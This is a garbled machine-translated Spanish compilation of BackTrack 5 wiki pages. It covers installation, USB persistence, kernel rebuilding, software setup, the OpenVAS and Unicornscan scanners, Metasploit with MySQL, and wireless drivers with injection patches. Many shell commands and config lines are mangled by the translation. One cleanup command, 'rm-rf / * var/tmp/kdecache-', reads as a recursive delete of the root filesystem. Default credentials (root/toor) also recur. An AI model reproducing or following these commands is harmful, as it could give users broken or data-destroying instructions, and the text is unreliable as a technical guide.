Академический Документы
Профессиональный Документы
Культура Документы
Descarga de BackTrack - Instalacin de BackTrack - Instalacin de VMware Tools - Uso bsico - Instalar VirtualBox
Descarga de
Contenido
[hide] 1 La descarga BackTrack 2 Verificaci n de la descarga en Linux 3 Verificaci n de la descarga en Windows 4 Verificaci n de la descarga en OSX 5 Notas Importante s 6 Qu sucede despus?
Descarga de BackTrack
Con el lanzamiento de Backtrack 5 que ahora soportan 32 bits, 64 bits y ARM. Backtrack 5 viene con dos gestores de ventanas principales - Gnome y KDE. Usted puede optar por descargar la pgina ya sea una imagen VMWare o una imagen ISO de inicio (recomendado si ejecutar Backtrack desde un LiveCD o una unidad de disco duro / USB). Por favor, use nuestras rplicas oficiales para descargar BackTrack. Estos se pueden encontrar en la pgina de descarga . No utilice un gestor de descargas con nuestros vnculos como la descarga es muy probable que se corrompe.
root @ bt: ~ #
BackTrack 5 R2 md5sums ISO se resumen a continuacin para su comodidad. BT5r2-KDE-64 KDE 64bit md5sum: 6d5996df868dfe9c31aad234187ad7d0 BT5r2-KDE-32 KDE 32bit md5sum: adb7eece8964aab083294f06aa44b625 BT5r2-GNOME GNOME-64 de 64 bits md5sum: 4864e7cacdc35a886ef8264eb346f414 BT5r2-GNOME GNOME-32 de 32 bits md5sum: 4ad5f359bad43bb934d59fcf6632ae1b BT5R2-GNOME-VM-32 de 32 bits GNOME md5sum: 9a8ec2fb4bbf4a5e626cfeb8970609fd BT5R2-GNOME-VM-64 de 64 bits GNOME md5sum: dad2f4bf1045c56c0104218fa5d68aff BT5r3-KDE-64 KDE 64bit md5sum: 981b897b7fdf34fb1431ba84fe93249f BT5r3-KDE-32 KDE 32bit md5sum: d324687fb891e695089745d461268576 BT5r3-GNOME GNOME-64 de 64 bits md5sum: 8cd98b693ce542b671edecaed48ab06d BT5r3-GNOME GNOME-32 de 32 bits md5sum: aafff8ff5b71fdb6fccdded49a6541a0
Notas Importantes
Los problemas ms comunes encontrados con BackTrack por los recin llegados son: 1. ISO md5sum desajustes, que se traducen en problemas de azar en BackTrack. 2. Medios de comunicacin de baja calidad (en el caso de los DVD), o quemar el archivo ISO a velocidades que son demasiado altos. 3. Burning BackTrack en un DVD como un archivo en lugar de una imagen de disco. Por favor, asegrese de comprobar todo lo que era anterior mencionado antes de comenzar un hilo en el Foro.
Y ahora qu?
El BackTrack 5 imagen ISO es de arranque, lo que significa que usted tendr que o bien quemar el ISO en un DVD o transferirla a un dispositivo USB. Una vez hecho esto, usted ser capaz de arrancar su equipo en el entorno BackTrack Live. A partir de este entorno vivo que puede seguir utilizando BackTrack o instalarlo en su disco duro utilizando una de las guas de instalacin que aparecen en la pgina de instalacin .
Introduccin
Nota Importante
Por favor recuerde que a pesar de que proporcionan estas guas de instalacin para que usted siga, no podemos ser responsables de que pierdas tu sistema operativo actualmente instalado / s o datos, ya que no puede dar cuenta de todas las combinaciones de configuracin que pueda tener. Tambin tenga en cuenta que tendr que adaptar cualquiera de estas guas para su entorno concreto.
Herramientas y Preparacin Thumbdrive USB (USB Capacidad de la unidad mnima de 4 GB) Backtrack 5 archivos ISO, md5sum verificado. UNetbootin - Una herramienta para transferir una imagen ISO en una unidad USB
UNetbootin permite crear unidades USB de arranque en vivo para Ubuntu, Fedora y otras distribuciones de Linux sin quemar un CD. Funciona tanto en Windows como Linux. Usted puede dejar que UNetbootin descargar una de las muchas distribuciones soportadas fuera de la caja para usted, o proporcionar su propio Linux. Iso si ya ha descargado uno o su distribucin preferida no est en la lista. Este mtodo de conseguir una instalacin en vivo en una unidad USB es el ms simple disponible utilizando Unetbootin. Tenga en cuenta que vamos a formatear la unidad USB y borrar su contenido. Nota: ahora se pueden guardar los cambios realizados en el sistema al reiniciar (persistencia). Descargue la ltima BackTrack iso de nuestra pgina de descargas BackTrack . Descargar UNetbootin , la ltima versin (Linux, Windows, OSX) Conecte su unidad USB Formatear la unidad USB en FAT32 Iniciar Unetbootin y seleccione la opcin "DiskImage" opcin, elija un BackTrack 5 archivo ISO. Seleccione la cantidad de espacio que se utilizar para la persistencia en MB Seleccione la unidad USB y haga clic en "Aceptar" para crear un arranque USB BackTrack.
Una vez reiniciado, recuerde que el nombre de usuario y la contrasea predeterminados son root / toor.
Persistent USB
Contenido
[hide] 1 Herramient as necesarias y Preparaci n 2 particiones 3 Instalar BackTrack al Thumbdriv e 4 Realice la unidad de inicio 5 Configure Persistenci a Herramientas y Preparacin USB Thumbdrive (Mnimo 8 GB, 16 GB recomendado) Backtrack 5 ISO archivo md5sum verificada, ni un DVD de arranque BT5 Vmware para arrancar el iso si decide realizar todos los pasos desde el interior de una mquina virtual como lo hice No importa la forma que elija, pero tened en cuenta que las designaciones de unidad pueden ser diferentes para usted de lo que eran para m. Esto puede no ser la mejor manera de hacer esto, pero funciona. Estoy seguro de que hay una manera ms elegante de hacer esto que yo pueda volver ms tarde si es necesario y permite tiempo. Particionamiento Muestra las unidades disponibles con el comando siguiente y determinar qu unidad que desea instalar.
dmesg | egrep hd \ |. sd.
La unidad de destino tiene que ser dividido de la siguiente manera: La primera particin debe ser una particin primaria de no ms de 3,5 GB y se puso a escribir vfat (yo he hecho esta particin ms grande de lo necesario a fin de que cubra todo el iso y futuras
versiones). Hacer la particin activa para evitar problemas de arranque. La segunda particin que almacena los cambios deben ocupar el resto del espacio en la memoria USB, o tanto como usted desea asignar a los cambios de ahorro (4,5 GB en un mnimo absoluto). Ejecute los siguientes comandos para realizar la particin.
fdisk / dev / sdb
# Utilice la letra de unidad correspondiente a su sistema. Eliminar todas las particiones existentes
Command (m for help): d Nmero de particin (1-4): 1
En este punto, puede que tenga que extraer y volver a insertar el disco para que los cambios de tabla de particin para ser reconocido y para que usted sea capaz de realizar el resto de los pasos. Dar formato a las particiones
mkfs.vfat-F 32-n BT5 / dev/sdb1 mkfs.ext3-b 4096-L casper-rw / dev/sdb2
Tenga en cuenta que la segunda particin debe ser etiquetado como casper-rw exactamente como est escrito aqu, no hay otra etiqueta va a funcionar, ni siquiera si usa tapones en su lugar. Instalar BackTrack al Thumbdrive Montar la primera particin que es sdb1 en este ejemplo.
mkdir / mnt/sdb1 mount / dev/sdb1 / mnt/sdb1
Este ltimo paso le tomar un par de minutos para el final, quizs ms, dependiendo de la velocidad de las unidades de disco y el mtodo que est utilizando.
Esto ha hecho que la unidad de arranque, pero a medida que haya archivos del isolinux con syslinux sern nombrados incorrectamente y estar en los lugares equivocados. Fcilmente podemos arreglar eso con los siguientes comandos.
cp-r isolinux syslinux cp syslinux / isolinux.cfg syslinux / syslinux.cfg cp syslinux / isolinux.bin syslinux / syslinux.bin
Configurar la persistencia
Para configurar los modos persistentes en las entradas que queremos, tenemos que hacer lo siguiente:
nano syslinux / syslinux.cfg
En mi caso, yo slo quera aadir un nuevo arranque por defecto, que es exactamente la misma que la
entrada predeterminada original con la excepcin de ser mi nuevo modo persistente. Para hacer lo mismo que usted debe hacer que su syslinux.cfg como la siguiente:
default 0 timeout vesamenu.c32 pronta 300 ttulo del men BackTrack Live CD fondo del men splash.png ttulo de men color 1; 37; 44 # c0ffffff # 00000000 std etiqueta DEFAULT men BackTrack persistente etiqueta de texto - Modo Texto persistente kernel de arranque / casper / vmlinuz append archivo = / cdrom / preseed / custom.seed boot = casper initrd persistente = / casper / initrd.gz texto splash vga = 791 - texto de la etiqueta etiqueta de men BackTrack Texto Texto de arranque en modo kernel / casper / vmlinuz append file = / cdrom / preseed / boot custom.seed = casper initrd = / casper / initrd.gz texto splash vga = 791 - STEALTH etiqueta etiqueta de men BackTrack Stealth - No Networking habilitado kernel / casper / vmlinuz append archivo = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrds.gz texto staticip splash vga = 791 - Forensics etiqueta etiqueta de men BackTrack Forensics - No Drive o intercambiar Monte kernel / casper / vmlinuz append archivo = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrdf.gz texto splash vga = 791 - etiqueta NODRM men etiqueta BackTrack noDRM - No DRM Drivers kernel / casper / vmlinuz append file = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrd.gz texto nomodeset splash vga = 791 - debug etiqueta etiqueta de men Debug BackTrack - kernel Modo seguro / casper / vmlinuz append file = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrd.gz texto - etiqueta memtest men etiqueta BackTrack Memtest - Run memtest kernel / isolinux / memtest append - Sello de men Boot hd etiqueta del disco duro - arrancar el primer disco duro LOCALBOOT 0x80 append -
Ahora tenemos que probar nuestra nueva modalidad persistente. Reinicie el sistema desde un dispositivo USB y seleccione "Texto BackTrack Persistent - Boot persistente Modo Texto" o esperar a que el tiempo de espera para arrancar por defecto. Para probar la persistencia, crear un archivo en cualquier lugar en el sistema, pero una nueva carpeta o archivo de texto en el escritorio es una diferencia visual muy fcil de verificar. Vuelva a arrancar. Si el archivo est ah despus de un reinicio, han tenido xito.
Mtodo de instalacin
NOTA: Se recomienda que tenga un mnimo de 20 GB de espacio en disco libre para instalar Backtrack! Arranque el Medio Ambiente Backtrack Live. En el indicador bash, escriba startx para entrar en la interfaz grfica de usuario. Haga doble clic en el Backtrack.sh de instalacin en el escritorio Vamos a pasar por el paso a paso de instalacin:
Seleccionamos nuestro idioma, en este caso Ingls y luego haga clic en el botn Adelante.
Hemos destacado por ubicacin geogrfica (La Zona Regin y Hora) y haga clic en Siguiente.
Elegimos la distribucin del teclado. Vamos a dejar el valor por defecto que es EE.UU. y haga clic en Siguiente.
Ahora es el momento de particionar el disco, para una instalacin de disco completo que elegir la opcin "Borrar y utilizar todo el disco" y haga clic en Siguiente.
ADVERTENCIA: Algunas veces el instalador se queda bloqueado en porcentajes de diferencia, lo dejo por un tiempo, ya que seguir adelante.
Despus del reinicio, puede iniciar sesin con el nombre de usuario root por defecto y Toor contrasea. No se olvide de cambiar esta contrasea de root por defecto con el comando passwd. Como se puede ver la pantalla de bienvenida desapareci despus del reinicio. Para solucionarlo basta con ejecutar fix-splash, y la pantalla de bienvenida aparecer en el siguiente arranque.
NOTA: El siguiente mtodo de instalacin es la ms simple disponible. Lo hemos hecho en el supuesto de que usted tiene una instalacin de Windows que est ocupando todo el espacio en el disco y que le gustara cambiar el tamao y crear particiones en el disco duro con el fin de permitir una instalacin BackTrack junto a su Windows. ADVERTENCIA: BACK-UP DE LA INSTALACIN DE WINDOWS PRIMERO! Vamos a pasar por el paso a paso de instalacin: Seleccionamos nuestro idioma, en este caso Ingls y luego haga clic en el botn Adelante.
Hemos destacado por ubicacin geogrfica (La Zona Regin y Hora) y haga clic en Siguiente.
Elegimos la distribucin del teclado. Vamos a dejar el valor por defecto que es EE.UU. y haga clic en Siguiente.
Ahora es el momento de particionar el disco, para una rpida y exitosa de doble arranque de la instalacin vamos a elegir la instalarlas al lado del otro, la eleccin entre ellos cada opcin de inicio y pulse Adelante ..
ADVERTENCIA: El instalador puede parar en ciertos porcentajes, se deja durante unos minutos y se reanudar. Pulse el botn Reiniciar ahora y disfrutar de Backtrack!
Cuando el equipo se inicia, se le dar la opcin de arrancar Backtrack o Windows. Despus del reinicio, puede iniciar sesin con el nombre de usuario root por defecto y Toor contrasea. No se olvide de cambiar esta contrasea de root por defecto con el comando passwd. Como se puede ver la pantalla de bienvenida desapareci despus del reinicio. Para solucionarlo basta con ejecutar fix-splash, y la pantalla de bienvenida aparecer en el siguiente arranque.
Uso bsico
Contenido
[hide] 1 Inicio de sesin en BackTrack 2 A partir de un entorno de interfaz grfica de usuario 3 X no comenzar ! 4 Red Llegar al trabajo 4.1 Co nfig ura ci n de la IP ma nua lme nte 4.2 Obt ene r una dire cci n IP est tica a peg arse entr e rein
X no comenzar!
En raras ocasiones (por ejemplo, despus de una instalacin de VMware Tools, o cuando se utilizan tarjetas de vdeo no compatible), X no se iniciar. Si esto sucede, usted tiene varias opciones que usted puede intentar para solucionar el problema: Volver a configurar el paquete del servidor X, se pueden restablecer (y muchas veces arreglarlo) Xorg configuraciones con el siguiente comando:
root @ bt: ~ # dpkg-reconfigure xserver-xorg
NOTA: A veces, puede que tenga que eliminar tambin las carpetas de cach en / var / tmp ejecutando el siguiente comando:
root @ bt: ~ # rm-rf / * var/tmp/kdecache-
Configuracin de la IP manualmente
Primero vamos a configurar la red manualmente. En el siguiente ejemplo vamos a suponer las siguientes direcciones y su finalidad:
Direccin IP - 192.168.1.112/24 Puerta de enlace predeterminada - 192.168.1.1 Servidor DNS - 192.168.1.1
Edite el archivo de segn sea apropiado, continuacin, tiene la de redes hecho para arriba automticamente en tiempo de boot:
root @ bt: ~ # update-rc.d valores predeterminados de red root @ bt: ~ # / etc / init.d / networking restart
Al iniciar servicios
BackTrack tiene varios servicios como Apache, SSH, MySQL, VNC, etc Todos ellos estn desactivados por defecto. Para iniciar un servicio como SSH, puede utilizar los scripts de inicio. Por ejemplo, para iniciar el servicio SSH:
root @ bt: ~ # sshd-generate # Especfico para el servicio SSH - necesario para generar las claves SSH root @ bt: ~ # / etc / init.d / ssh inicio A partir de OpenBSD Secure Shell servidor: sshd. root @ bt: ~ # / etc / init.d / ssh stop Detencin de OpenBSD Secure Shell servidor: sshd. root @ bt: ~ #
Si utiliza un servidor ssh, por primera vez en Backtrack tendr que generar claves:
root @ bt: ~ # sshd-generate
Para activar un servicio en tiempo de arranque, puede utilizar el comando update-rc.d, por ejemplo, tener SSH inicie durante el arranque:
root @ bt: ~ # update-rc.d-f ssh por defecto Adicin de arranque del sistema para / / etc init.d / ssh ... / Etc/rc0.d/K20ssh -> .. / init.d / ssh / Etc/rc1.d/K20ssh -> .. / init.d / ssh
/ Etc/rc6.d/K20ssh -> .. / init.d / ssh / Etc/rc2.d/S20ssh -> .. / init.d / ssh / Etc/rc3.d/S20ssh -> .. / init.d / ssh / Etc/rc4.d/S20ssh -> .. / init.d / ssh / Etc/rc5.d/S20ssh -> .. / init.d / ssh root @ bt: ~ #
dpkg-reconfigure <paquete> Vuelve a configurar un paquete instalado dpkg Hombre os dar ms informacin sobre estos comandos, as como muchos de los que son de uso menos frecuente.
Otro recurso muy bueno en el uso de comandos de Linux se puede encontrar en linuxcommand.org Algunos programas no tienen una pgina de manual, pero por lo general puede conseguir ms informacin sobre su uso, escriba:
root @ bt: ~ # <Nombre Slo el nombre del programa sin ningn arguements.
o
root @ bt: ~ # <Nombre-ayuda
o
root @ bt: ~ # <Nombre - Ayuda
o
root @ bt: ~ # <Nombre-h
Algunos programas utilizan otros mtodos, pero son por lo general slo una variacin de una de las anteriores cinco comandos.
Ncleo
Actualmente no hay texto en esta pgina. Puedes buscar este ttulo de pgina en otras pginas, o buscar en los registros relacionados .
Cmo se prepara BT5 fuentes del mismo (Vmare herramientas, conductores, etc)
De vez en cuando es posible que desee compilar el cdigo que requiere cabeceras del ncleo (como compat-wireless o los conductores de otro tipo). Estas son las instrucciones rpidas sobre cmo hacerlo.
root @ bt: ~ # preparar-kernel-sources root @ bt: ~ # cd / usr / src / linux root @ bt: ~ # cp-rf include / genera / * include / linux /
NOTA: Es necesario estar conectado a Internet para poder descargar el paquete linux-source.
PAE kernel
Despus de haber lanzado las ncurses menuconfig se procede al permitir PAE que se puede encontrar en las siguientes: Processor type and features -> Soporte de memoria alta (4) -> 64 GB
Una vez que hemos habilitado PAE del menuconfig que avancemos en la construccin de nuestro ncleo.
root @ bt :/ usr / src / linux # make guiones root @ bt :/ usr / src / linux # make preparar
root @ bt :/ usr / src / linux # make root @ bt :/ usr / src / linux # update-initramfs-u root @ bt: ~ # update-grub2
Tenemos que reiniciar el sistema y compruebe si PAE est habilitado. (Ajustar la ruta de acceso al ncleo en ejecucin)
root @ bt: ~ # cat / boot/config-3.2.6 | grep Highmem </ span # CONFIG_HIGHMEM64G no est configurado CONFIG_HIGHMEM = y
NOTA: Si cambia las opciones adicionales en las ncurses configuracin sin saber cules son las opciones se podra romper su ncleo! Habilitacin b43 conductores en BT5 R2 y R3 se requieren recompilar el kernel.
root @ bt: ~ # apt-get dist-upgrade root @ bt: ~ # preparar-kernel-sources root @ bt :/ usr / src / linux # zcat / proc / config.gz>. config root @ bt :/ usr / src / linux # make menuconfig
Configurar el kernel para utilizar B43 en lugar de los controladores predeterminados brcmsmac seleccionando la opcin de soporte BCMA. Para acceder a esta opcin, vaya a:
Drivers de dispositivos -> Broadcom especfico AMBA.
Agregue el apoyo BCMA como mdulo, y "Apoyo a BCMA en el bus PCI-host" como se muestra a continuacin
Personalizacin de BackTrack
Preparacin BT5 fuentes del kernel Instalacin de Java Configuracin FluxBox Instalar Flash Player Instalacin de OpenCL
Cmo se prepara BT5 fuentes del mismo (Vmare herramientas, conductores, etc)
De vez en cuando es posible que desee compilar el cdigo que requiere cabeceras del ncleo (como compat-wireless o los conductores de otro tipo). Estas son las instrucciones rpidas sobre cmo hacerlo.
root @ bt: ~ # preparar-kernel-sources root @ bt: ~ # cd / usr / src / linux root @ bt: ~ # cp-rf include / genera / * include / linux /
NOTA: Es necesario estar conectado a Internet para poder descargar el paquete linux-source.
Instalar Java
Instalar Java
Este artculo fue contribuido por g0tmi1k. Twitter: ! https://twitter.com/ # / g0tmi1k NOTA: Antes de instalar Java asegrese de matar Firefox.
root @ bt: ~ # killall -9 / opt / firefox / firefox-bin
Puede descargar Java desde el oficial sitio web . (Descargar versin tar.gz) En primer lugar, crear el directorio java y lugar all:
root @ bt: ~ # mkdir / opt / java root @ bt: ~ # mv-f jre1.7.0_05 / / opt / java /
Cambios finales.
root @ bt: ~ # update-alternatives - install / usr / bin / java java / opt/java/jre1.7.0_05/bin/java 1 root @ bt: ~ # update-alternatives - set java / opt/java/jre1.7.0_05/bin/java
Probando el plugin.
root @ bt: ~ # firefox http://java.com/en/download/testjava.jsp
Instalar Fluxbox
Despus de que el script est instalado, veremos que iniciar automticamente la configuracin de Fluxbox.
Una vez que el guin est terminado se le presentar con un mensaje que le indica que debe iniciar su Fluxbox.
Sin embargo antes de que reinicie hay una cosa que tenemos que hacer, vamos a tener que hacer saber a ejecutar BackTrack FluxBox sobre el comando startx y no es por defecto WM.
root @ bt:. ~ # echo exec / usr / bin / startfluxbox> ~ / xinitrc root @ bt: ~ # shutdown-r 0
NOTA: Para volver a la configuracin predeterminada WM todo lo que tienes que hacer es eliminar el archivo xinitrc..
root @ bt:. ~ # rm-rf ~ / xinitrc root @ bt: ~ # shutdown-r 0
Despus de quitar flash que necesita para obtener el reproductor de flash de nuevo el oficial [ http://www.adobe.com/software/flash/about/ sitio web]. (Descargar en formato tar.gz) Lo siguiente que se har cargo del reproductor de Flash:
root @ bt: ~ # mkdir-p ~ / .mozilla / plugins root @ bt: ~ # mkdir Flash root @ bt: ~ # mv-f install_flash_player_11_linux.i386.tar.gz flash / root @ bt: ~ # cd flash / root @ bt: ~ / flash # tar install_flash_player_11_linux.i386.tar.gz xvfz root @ bt: ~ / flash # cp-f libflashplayer.so ~ / .mozilla / plugins /
Instale OpenCL
Empecemos: En primer lugar antes de empezar queremos asegurarnos de que nuestro sistema est actualizado.
root @ bt: ~ # apt-get update && apt-get upgrade
Antes de continuar con la instalacin de los controladores de ATI que necesitamos para que nuestro cdigo fuente del kernel preparado.
root @ bt: ~ # preparar-kernel-sources root @ bt: ~ # cd / usr / src / linux root @ bt: ~ # cp-rf include / genera / * include / linux /
Antes de que termine hay una cosa ms que tenemos que instalar, el AMD Accelerated Parallel Processing (APP) SDK, ste debe ser instalado de acuerdo con la arquitectura de CPU. Para la arquitectura de 32 bits:
root @ bt: ~ # wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.5-lnx32.tgz root @ bt: ~ # tar-xvzf AMD-APP-SDK-v2.5-lnx32.tgz root @ bt:. ~ # / Install-AMD-APP.sh
Tambin necesitaremos cmake y cmake + + junto con algunos archivos de la biblioteca. En primer lugar, instalar las bibliotecas y cmake:
root @ bt: ~ # apt-get install libroot-python-dev libboost-python-dev zlib1g-dev libssl-dev cmake libboost1.40-all-dev
Antes de poder instalar cmake + + tenemos que establecer las rutas de ATI Stream:
root @ bt: ~ # echo "ATISTREAMSDKROOT = / opt / AMDAPP root @ bt:. ~ # export ATISTREAMSDKROOT ">> ~ / bashrc root @ bt:. ~ # source ~ / bashrc
Recopilacin de informacin
Autoscan - Unicornscan
Autoscan
Vamos a configurar rpidamente autoscan en Backtrack5, puede encontrarlo mediante el men en: BackTrack -> Recopilacin de Informacin -> Anlisis de Red -> Red Scanners -> autoscan
Tan pronto como iniciarlo desde el men comenzaremos nuestro asistente de configuracin, haga clic en Siguiente para continuar:
Ahora vamos a configurar una nueva red y aadir nuestros propios datos haciendo clic en el botn Aadir:
Unicornscan
Unicornscan es un impresionante "remitente carga til", que tambin puede actuar como un escner asncrona. Gracias a dash1b y su guin impresionante parche en marcha, hemos sido capaces de implementar rpidamente las caractersticas completas del escner en BackTrack 5. Para instalar unicornscan en BackTrack 5 (si no est ya instalado), escriba:
A continuacin, ejecute la secuencia de comandos de configuracin de postgres, que fue tomada en su mayora de http://code.google.com/p/unicornscan-bt5-install-script/ . Este script configurar el servidor PostgreSQL Framework3 como la base de datos back-end para Unicornscan. Iniciar apache, y vaya a http://127.0.0.1/unicornscan . Iniciar una exploracin utilizando la opcinepgsqldb.
Introduccin> Kernel> Personalizacin> Recopilacin de informacin> Vulnerabilidad Identificacin> Explotacin> Radio Network Analysis> Privilege Escalation> Telefona> Forense> Errores conocidos BackTrack Preguntas ms frecuentes
Caja de herramientas
Lo que enlaza aqu Seguimiento de enlaces Pginas especiales Versin para imprimir Enlace permanente
Vulnerabilidad de identificacin
OpenVAS
Contenido
[hide] 1 Instalacin de OpenVAS 2 Ubicacin de las entradas del men OpenVAS 3 OpenVAS comprobar la configuraci n 4 Configurac in de OpenVAS 4.1 Pas o 1. A adir un usu ario 4,2 Pas o 2. Hac er el Cer tific ado 4.3 Pas o 3. La sinc roni zaci n
Instalacin OpenVAS
La forma ms sencilla de instalar todos los componentes necesarios de la suite openvas es emitir los mandatos siguientes en una ventana de terminal.
root @ bt: ~ # apt-get update root @ bt: ~ # apt-get install openvas
Los openvas paquete es un "maestro" paquete que contiene toda la informacin necesaria para descargar automticamente todos los paquetes que componen la suite completa de herramientas de openvas.
Configuracin de OpenVAS
Paso 1. Aadir un usuario
En el men, seleccione OpenVAS Adduser y siga las instrucciones. Tenga en cuenta que puede utilizar cualquier nombre de usuario que quiera, pero en este caso he usado la raz. Lo he dejado en el valor predeterminado de autenticacin de contrasea como voy a usar esto en una mquina local y para evitar tener que preocuparse acerca de los usuarios que tienen certs de qu preocuparse, pero esto es totalmente de usted. No se puede tener una contrasea vaca, as que he utilizado Toor en este caso. Para las reglas que se aplican a este usuario he dejado en blanco presionando ctrl-d Esto significa que este usuario ser capaz de realizar cualquier tarea sin ningn tipo de restricciones.
Tenga en cuenta el tiempo en la esquina! Esto fue en una mquina virtual de lo que debe ser mucho ms rpido para usted. Arranques posteriores ser rpido a menos que no haya actualizado en bastante tiempo Por favor, recuerde que el escner se ejecuta como un demonio en el fondo y seguir funcionando hasta que se reinicie o pararlo con la entrada de men proporciona.
ahora tenemos que reconstruir la base de datos, ya que ahora est fuera de fecha con el agregado de nvt y que de otra manera sera obtener errores sobre la base de datos. Usted debe hacer esto cada vez que actualice el de NVT. Esto se hace con un simple comando
openvasmd - rebuild
Este proceso slo tomar unos segundos si se utiliza OpenVAS bibliotecas de la versin 4.0.3 o inferior. Este proceso puede tomar mucho ms tiempo si se utiliza OpenVAS bibliotecas de la versin 4.0.5 o superior. La desventaja de este tiempo extra es mucho mayor capacidad de exploracin, por lo que vale la pena.
openvasadmin es el nombre que he elegido para convertirse en el usuario, sin embargo, puede sustituir eso con algo ms adecuado para usted si as lo desea. Asegrese de que puede recordar este nombre de usuario y la contrasea asociada, ya que lo necesitar cuando ejecute openvas.
root @ bt: ~ # openvasad-c 'add_user'-n-r openvasadmin administracin Palabra clave: anuncio principal: MENSAJE :5871:2011-05-26 04h57.08 BST: No hay reglas expediente previsto, el
nuevo usuario no tendr restricciones. anuncio principal: MENSAJE :5871:2011-05-26 04h57.08 BST: openvasadmin usuario se ha creado correctamente. root @ bt: ~ #
Ms informacin sobre estos comandos y otras opciones se pueden encontrar mediante la ejecucin de su entrada en el men asociado y mirando las pginas de manual. Como los tres de estos anlisis como un demonio y seguir funcionando hasta que se cierre su computadora, me han proporcionado las entradas de men para usted de modo que usted puede detenerlos cuando ya no los necesite. En este punto de la instalacin es prcticamente completa, pero como hemos llegado hasta aqu bien podemos seguir para asegurarse de que todo est funcionando como se esperaba.
Inicie esto desde la opcin de men y rellenar las credenciales y los detalles que hemos creado anteriormente, a continuacin, haga clic en el botn de inicio de sesin. Una vez conectado usted puede utilizar esto como su interfaz de exploracin, o utilizar la opcin siguiente de que usted prefiera.
Interfaz web
El siguiente mtodo es a travs de una interfaz web Abra su navegador favorito y escriba la siguiente direccin 127.0.0.1:9392 A continuacin se le presentar una pgina de inicio de sesin. iniciar sesin con las credenciales que hemos creado antes. Una vez que haya iniciado la sesin, se dar cuenta de que su uso de la CPU se golpe el techo, no se preocupe, este volver a la normalidad en poco tiempo. Aqu puede realizar y configurar todas las tareas de escaneo. Es una buena idea establecer NoScript para permitir temporalmente 127.0.0.1 o puede obtener resultados inesperados. Hay mucho ms para OpenVAS que he incluido aqu, pero esto es slo la intencin de poner en marcha rpidamente. Analiza y configuraciones ms avanzadas estn ms all del alcance de este tutorial simple. No se olvide de algunas de las otras partes a openvas contenidos en el men que no he tratado aqu y tambin las pginas de manual.
Luego, desde el men Comience Greenbone seguridad de escritorio y login Ahora est listo para configurar tareas de exploracin.
Metasploit Framework con soporte MySQL Con una reciente correccin de errores, hemos simplificado los pasos necesarios para utilizar MySQL como back-end para el Metasploit Framework.
root @ bt: ~ # apt-get update root @ bt: ~ # apt-get dist-upgrade root @ bt: ~ # mysql servicio de inicio root @ bt: ~ # msfconsole
msf> Vaya por delante y conectarse a la base de datos utilizando la contrasea de root por defecto de MySQL Toor:
msf> db_driver mysql [*] El uso de bases de datos mysql conductor msf> root db_connect: toor@127.0.0.1 / msf3 msf>
Wireless Drivers
Wireless Drivers
Con el escenario siempre cambiante del mundo del controlador inalmbrico y el mac80211 pila, hemos querido dedicar una pgina que resolver algunas configuraciones complicadas inalmbricos controladores. Antes de iniciar su viaje hacia BackTrack mundo inalmbrico, primero debe identificar el chipset de la tarjeta inalmbrica con un 100% de certeza. En caso de duda, usted siempre se puede intentar de enchufar el tarjeta en una casilla de Linux, y ver lo que dmesg tiene que decir.
Contenido
[hide] 1 BackTrack 5 r2 1.1 b43 2 BackTrack 5 r1 2,1 rt28 00u sb 3 BackTrack 5 3.1 Wir eles s Dri ver s 3 3 3.2 Tarj etas inal m bric as 3 3 3
BackTrack 5 r2
BackTrack 5 R2 contiene imgenes del kernel parcheado 3.2.6 controladores inalmbricos con varios parches de inyeccin aplicados.
b43
BackTrack 5 R2 ha pasado de b43 conductores a los conductores brcmsmac. Si necesitas habilitar los b43 controladores, siga esta gua - http://www.backtrack-linux.org/wiki/index.php? title=Enable_b43_drivers_in_Backtrack5_r2 .
BackTrack 5 r1
BackTrack 5 R1 contiene parches del kernel 2.6.39.4 del stock controladores inalmbricos con varios parches de inyeccin aplicados. Dependiendo de la tarjeta y la configuracin, estos controladores no le conviene.
rt2800usb
En algunos casos hemos visto las tarjetas que utilizan los controladores rt2800usb (como el AWUS036NH y Alfs AWUS036NEH) actuar extrao con el kernel BT5R1. Si esto le sucede a usted, usted puede intentar instalar un reciente compat-wireless y construir por su cuenta. Esta versin especfica funcionar:
root @ bt: ~ # ln-s / usr / src / linux / lib/modules/2.6.39.4/build root @ bt: ~ # cd / usr / src / root root root root root root root root root root root @ bt: @ bt: @ bt: @ bt: @ bt: @ bt: @ bt: @ bt: @ bt: @ bt: @ bt: ~ # tar jxpf compat-wireless-2011-07-14.tar.bz2 ~ # wget http://www.backtrack-linux.org/2.6.39.patches.tar ~ # tar xpf 2.6.39.patches.tar ~ # cd compat-wireless-2011-07-14 ~ # patch-p1 <.. / patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch ~ # patch-p1 <.. / patches/mac80211.compat08082009.wl_frag + ack_v1.patch ~ # patch-p1 <.. / patches/zd1211rw-2.6.28.patch ~ # patch-p1 <.. / patches/ipw2200-inject.2.6.36.patch ~ # make ~ # make install ~ # reboot
BackTrack 5
BackTrack 5 contiene imgenes del kernel 2.6.38 parcheado controladores inalmbricos, as como varios conductores "externos". Algunos de estos controladores se solapan, para proporcionar una flexibilidad mxima con varios ataques inalmbricos. El archivo / etc / modprobe.d / blacklist dicta que los conductores preferidos se cargan al arrancar el sistema. En trminos generales, todos los conductores de edad avanzada IEEE estn en listas negras y tienen que cargarse manualmente si quieres usarlos.
Wireless Drivers
rtl8187 vs r8187
Esto es confuso. El rtl8187 es el conductor de pila mac80211, mientras que el r8187 es el antiguo controlador IEEE. Tanto el apoyo de la inyeccin. Los ms nuevos mac80211 RTL8187 conductores parecen tener un desagradable error en VMWare. Para obtener ms informacin acerca de estos controladores visite nuestro rtl8187 vs r8187 pgina.
compat wireless
Como Linux controladores inalmbricos maduro, ms chipsets se aaden a la lista de compatibilidad. Si ninguno de los controladores del ncleo nativo BackTrack trabajar para usted, es posible que desee considerar el uso de una versin ms reciente de compat-wireless. Echa un vistazo a la compat-wireless pgina para obtener informacin sobre cmo obtener los drivers y funcionando.
Tarjetas inalmbricas
ESTA LISTA DEBE SER ACTUALIZADO PARA BT5.
NO tarjetas de trabajo
D-Link DWL-122 - utilizando los drivers mac80211 prism2_usb - fail Linksys WUSB600N v2 - utilizando los drivers mac80211 rt2800usb - fail AWUS051NH - fail
Este artculo fue contribuido por MI1. URL: http://hack4fun.eu Twitter: ! http://twitter.com/ # / mi1c00k Email: fblubr@gmail.com
Contenido
